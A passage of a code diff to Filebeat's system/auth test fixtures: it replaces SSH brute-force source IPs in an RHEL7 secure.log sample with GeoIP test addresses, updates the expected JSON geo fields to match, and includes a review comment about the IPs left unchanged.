-Feb 22 17:02:54 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:54 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:54 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:55 slave22 sshd[3248]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:02:55 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:56 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:56 slave22 sshd[3244]: Failed
password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:56 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:57 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
-Feb 22 17:02:58 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:58 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:59 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:00 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:03:00 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:03:00 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:02 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:03:02 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:03:02 slave22 sshd[3244]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:03:02 slave22 sshd[3244]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:03:02 slave22 sshd[3244]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:03:02 slave22 sshd[3244]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:03:07 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:09 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
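Review bot: Only 202.109.143.106 and 116.31.116.27 are rewritten in this hunk (and likewise in the -868 and -964 hunks below), while 223.99.60.46 and, in the -868 hunk, 78.52.112.222 stay in the fixture as real public addresses. The replacement addresses look like entries from a GeoIP test database — the expected-output hunks turn 202.196.224.106 into a country-level Philippines record and drop the `source.as.*` and `source.geo.region_*` fields, which is consistent with that — so the geo and AS expectations for the untouched addresses presumably still depend on whichever database the test environment resolves them against. If the goal is to make the fixture independent of a live GeoIP database, the remaining addresses should be swapped to test-database entries too; if only these two were meant to change, a one-line comment next to the fixture (or in the PR description) saying why would spare the next maintainer the same question.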
@@ -868,95 +868,95 @@ Feb 22 17:03:14 slave22 sshd[3248]: Failed password for root from 223.99.60.46 p
 Feb 22 17:03:15 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:18 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
 Feb 22 17:03:18 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:20 slave22 sshd[3252]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:03:20 slave22 sshd[3252]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:03:20 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:20 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
 Feb 22 17:03:20 slave22 sshd[3248]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:03:20 slave22 sshd[3248]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:03:20 slave22 sshd[3248]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:03:21 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:21 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:22 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:22 slave22 sshd[3260]: Accepted publickey for tsg from 78.52.112.222 port 57936 ssh2: RSA 7c:28:53:4b:dd:5d:1e:07:77:0e:98:01:96:0d:c5:95
 Feb 22 17:03:22 slave22 sshd[3260]: pam_unix(sshd:session): session opened for user tsg by (uid=0)
-Feb 22 17:03:23 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:23 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port
4411 ssh2
 Feb 22 17:03:24 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:26 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:26 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:26 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:28 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:28 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:28 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:31 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:31 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:31 slave22 sshd[3252]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:03:31 slave22 sshd[3252]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:03:31 slave22 sshd[3252]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:03:31 slave22 sshd[3252]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:03:33 slave22 sshd[3256]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:03:33 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:35 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:35 slave22 sudo: tsg : TTY=pts/0 ; PWD=/home/tsg ; USER=root ; COMMAND=/bin/cat /var/log/secure
 Feb 22 17:03:36 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:37
slave22 sshd[3298]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 17:03:37 slave22 sshd[3298]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 17:03:37 slave22 sshd[3298]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:37 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:38 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:38 slave22 sshd[3298]: Failed password for root from 116.31.116.27 port 52640 ssh2
+Feb 22 17:03:38 slave22 sshd[3298]: Failed password for root from 216.160.83.58 port 52640 ssh2
 Feb 22 17:03:39 slave22 sshd[3298]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:40 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
-Feb 22 17:03:41 slave22 sshd[3298]: Failed password for root from 116.31.116.27 port 52640 ssh2
+Feb 22 17:03:41 slave22 sshd[3298]: Failed password for root from 216.160.83.58 port 52640 ssh2
 Feb 22 17:03:41 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:41 slave22 sshd[3298]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:42 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
-Feb 22 17:03:42 slave22 sshd[3298]: Failed password for root from 116.31.116.27 port 52640 ssh2
+Feb 22 17:03:42 slave22 sshd[3298]: Failed password for root from 216.160.83.58 port 52640 ssh2
 Feb 22 17:03:43 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:43 slave22 sshd[3298]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 17:03:43 slave22 sshd[3298]: PAM 2 more authentication failures; logname= uid=0
euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 17:03:43 slave22 sshd[3298]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 17:03:43 slave22 sshd[3298]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 17:03:45 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:46 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:48 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:48 slave22 sshd[3256]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:03:48 slave22 sshd[3256]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:03:48 slave22 sshd[3256]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:03:53 slave22 sshd[3317]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:03:53 slave22 sshd[3317]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:03:53 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:55 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:03:55 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:03:55 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:57 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:03:57 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:03:57 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:00 slave22 sshd[3317]: Failed password for root
from 202.109.143.106 port 4037 ssh2
+Feb 22 17:04:00 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:04:00 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:01 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:04:01 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:04:02 slave22 sshd[3313]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:04:02 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:02 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:04 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
-Feb 22 17:04:04 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:04:04 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:04:04 slave22 sshd[3317]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:04:04 slave22 sshd[3317]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:04:04 slave22 sshd[3317]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:04:04 slave22 sshd[3317]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:04:04 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:07 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22 17:04:08 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:10 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22
17:04:10 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:11 slave22 sshd[3321]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:04:11 slave22 sshd[3321]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:04:11 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:12 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:12 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:12 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:13 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22 17:04:13 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:14 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:14 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:14 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:15 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
-Feb 22 17:04:16 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:16 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:16 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:16 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:18 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22 17:04:18 slave22 sshd[3313]:
Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:04:18 slave22 sshd[3313]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:04:18 slave22 sshd[3313]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:04:19 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:19 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:19 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:21 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:21 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:21 slave22 sshd[3321]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:04:21 slave22 sshd[3321]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:04:21 slave22 sshd[3321]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:04:21 slave22 sshd[3321]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:04:29 slave22 sshd[3325]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:04:29 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
@@ -964,37 +964,37 @@ Feb 22 17:04:30 slave22 sshd[3325]: Failed password for root from 223.99.60.46 p
 Feb 22 17:04:31 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:33 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
 Feb 22 17:04:34 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:35 slave22 sshd[3333]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 17:04:35 slave22 sshd[3333]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 17:04:35 slave22 sshd[3333]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:35 slave22 sshd[3329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:04:35 slave22 sshd[3329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:04:35 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:36 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
-Feb 22 17:04:36 slave22 sshd[3333]: Failed password for root from 116.31.116.27 port 37886 ssh2
-Feb 22 17:04:36 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:36 slave22 sshd[3333]: Failed password for root from 216.160.83.58 port 37886 ssh2
+Feb 22 17:04:36 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:37 slave22 sshd[3333]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:37 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:37 slave22 sshd[3325]:
pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:39 slave22 sshd[3333]: Failed password for root from 116.31.116.27 port 37886 ssh2
-Feb 22 17:04:39 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:39 slave22 sshd[3333]: Failed password for root from 216.160.83.58 port 37886 ssh2
+Feb 22 17:04:39 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:39 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
 Feb 22 17:04:39 slave22 sshd[3333]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:39 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:40 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:41 slave22 sshd[3333]: Failed password for root from 116.31.116.27 port 37886 ssh2
+Feb 22 17:04:41 slave22 sshd[3333]: Failed password for root from 216.160.83.58 port 37886 ssh2
 Feb 22 17:04:42 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
-Feb 22 17:04:42 slave22 sshd[3333]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 17:04:42 slave22 sshd[3333]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 17:04:42 slave22 sshd[3333]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 17:04:42 slave22 sshd[3333]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 17:04:42 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:42 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:42 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:44 slave22 sshd[3325]: Failed
password for root from 223.99.60.46 port 33646 ssh2
 Feb 22 17:04:44 slave22 sshd[3325]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:04:44 slave22 sshd[3325]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:04:44 slave22 sshd[3325]: PAM service(sshd) ignoring max retries; 6 > 3
 Feb 22 17:04:44 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:46 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:46 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:47 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:48 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:48 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:49 slave22 sshd[3329]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:04:49 slave22 sshd[3329]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:04:49 slave22 sshd[3329]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:04:49 slave22 sshd[3329]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:04:51 slave22 sudo: tsg : TTY=pts/0 ; PWD=/home/tsg ; USER=root ; COMMAND=/bin/cp /var/log/secure .
diff --git a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json
index d6319b0e82a1..e5dbba8c56f3 100644
--- a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json
+++ b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json
@@ -23,22 +23,18 @@ "slave22" ], "related.ip": [ - "202.109.143.106" + "202.196.224.106" ], "related.user": [ "root" ], "service.type": "system", - "source.as.number": 4134, - "source.as.organization.name": "No.31,Jin-rong Street", "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 28.55, - "source.geo.location.lon": 115.9333, - "source.geo.region_iso_code": "CN-JX", - "source.geo.region_name": "Jiangxi", - "source.ip": "202.109.143.106", + "source.geo.country_iso_code": "PH", + "source.geo.country_name": "Philippines", + "source.geo.location.lat": 13.0, + "source.geo.location.lon": 122.0, + "source.ip": "202.196.224.106", "source.port": 1786, "system.auth.ssh.event": "Failed", "system.auth.ssh.method": "password", @@ -89,22 +85,18 @@ "slave22" ], "related.ip": [ - "202.109.143.106" + "202.196.224.106" ], "related.user": [ "root" ], "service.type": "system", - "source.as.number": 4134, - "source.as.organization.name": "No.31,Jin-rong Street", "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 28.55, - "source.geo.location.lon": 115.9333, - "source.geo.region_iso_code": "CN-JX", - "source.geo.region_name": "Jiangxi", - "source.ip": "202.109.143.106", + "source.geo.country_iso_code": "PH", + "source.geo.country_name": "Philippines", + "source.geo.location.lat": 13.0, + "source.geo.location.lon": 122.0, + "source.ip": "202.196.224.106", "source.port": 1786, "system.auth.ssh.event": "Failed", "system.auth.ssh.method": "password", 
@@ -155,22 +147,18 @@
 "slave22"
 ],
 "related.ip": [
- "202.109.143.106"
+ "202.196.224.106"
 ],
 "related.user": [
 "root"
 ],
 "service.type": "system",
- "source.as.number": 4134,
- "source.as.organization.name": "No.31,Jin-rong Street",
 "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "CN",
- "source.geo.country_name": "China",
- "source.geo.location.lat": 28.55,
- "source.geo.location.lon": 115.9333,
- "source.geo.region_iso_code": "CN-JX",
- "source.geo.region_name": "Jiangxi",
- "source.ip": "202.109.143.106",
+ "source.geo.country_iso_code": "PH",
+ "source.geo.country_name": "Philippines",
+ "source.geo.location.lat": 13.0,
+ "source.geo.location.lon": 122.0,
+ "source.ip": "202.196.224.106",
 "source.port": 1786,
 "system.auth.ssh.event": "Failed",
 "system.auth.ssh.method": "password",
@@ -202,7 +190,7 @@
 "host.hostname": "slave22",
 "input.type": "log",
 "log.offset": 618,
- "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root",
+ "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root",
 "process.name": "sshd",
 "process.pid": 2738,
 "related.hosts": [
@@ -236,7 +224,7 @@
 "host.hostname": "slave22",
 "input.type": "log",
 "log.offset": 842,
- "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root",
+ "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root",
 "process.name": "sshd",
 "process.pid": 2742,
 "related.hosts": [
@@ -289,22 +277,18 @@
 "slave22"
 ],
 "related.ip": [
- "202.109.143.106"
+ "202.196.224.106"
 ],
 "related.user": [
 "root"
 ],
 "service.type": "system",
- "source.as.number": 4134,
- "source.as.organization.name": "No.31,Jin-rong Street",
 "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "CN",
- "source.geo.country_name": "China",
- "source.geo.location.lat": 28.55,
- "source.geo.location.lon": 115.9333,
- "source.geo.region_iso_code": "CN-JX",
- "source.geo.region_name": "Jiangxi",
- "source.ip": "202.109.143.106",
+ "source.geo.country_iso_code": "PH",
+ "source.geo.country_name": "Philippines",
+ "source.geo.location.lat": 13.0,
+ "source.geo.location.lon": 122.0,
+ "source.ip": "202.196.224.106",
 "source.port": 3576,
 "system.auth.ssh.event": "Failed",
 "system.auth.ssh.method": "password",
@@ -355,22 +339,18 @@
 "slave22"
 ],
 "related.ip": [
- "202.109.143.106"
+ "202.196.224.106"
 ],
 "related.user": [
 "root"
 ],
 "service.type": "system",
- "source.as.number": 4134,
- "source.as.organization.name": "No.31,Jin-rong Street",
 "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "CN",
- "source.geo.country_name": "China",
- "source.geo.location.lat": 28.55,
- "source.geo.location.lon": 115.9333,
- "source.geo.region_iso_code": "CN-JX",
- "source.geo.region_name": "Jiangxi",
- "source.ip": "202.109.143.106",
+ "source.geo.country_iso_code": "PH",
+ "source.geo.country_name": "Philippines",
+ "source.geo.location.lat": 13.0,
+ "source.geo.location.lon": 122.0,
+ "source.ip": "202.196.224.106",
 "source.port": 3576,
 "system.auth.ssh.event": "Failed",
 "system.auth.ssh.method": "password",
@@ -421,22 +401,18 @@
 "slave22"
 ],
 "related.ip": [
- "202.109.143.106"
+ "202.196.224.106"
 ],
 "related.user": [
 "root"
 ],
 "service.type": "system",
- "source.as.number": 4134,
- "source.as.organization.name": "No.31,Jin-rong Street",
 "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "CN",
- "source.geo.country_name": "China",
- "source.geo.location.lat": 28.55,
- "source.geo.location.lon": 115.9333,
- "source.geo.region_iso_code": "CN-JX",
- "source.geo.region_name": "Jiangxi",
- "source.ip": "202.109.143.106",
+ "source.geo.country_iso_code": "PH",
+ "source.geo.country_name": "Philippines",
+ "source.geo.location.lat": 13.0,
+ "source.geo.location.lon": 122.0,
+ "source.ip": "202.196.224.106",
 "source.port": 3576,
 "system.auth.ssh.event": "Failed",
 "system.auth.ssh.method": "password",
@@ -487,22 +463,18 @@
 "slave22"
 ],
 "related.ip": [
- "202.109.143.106"
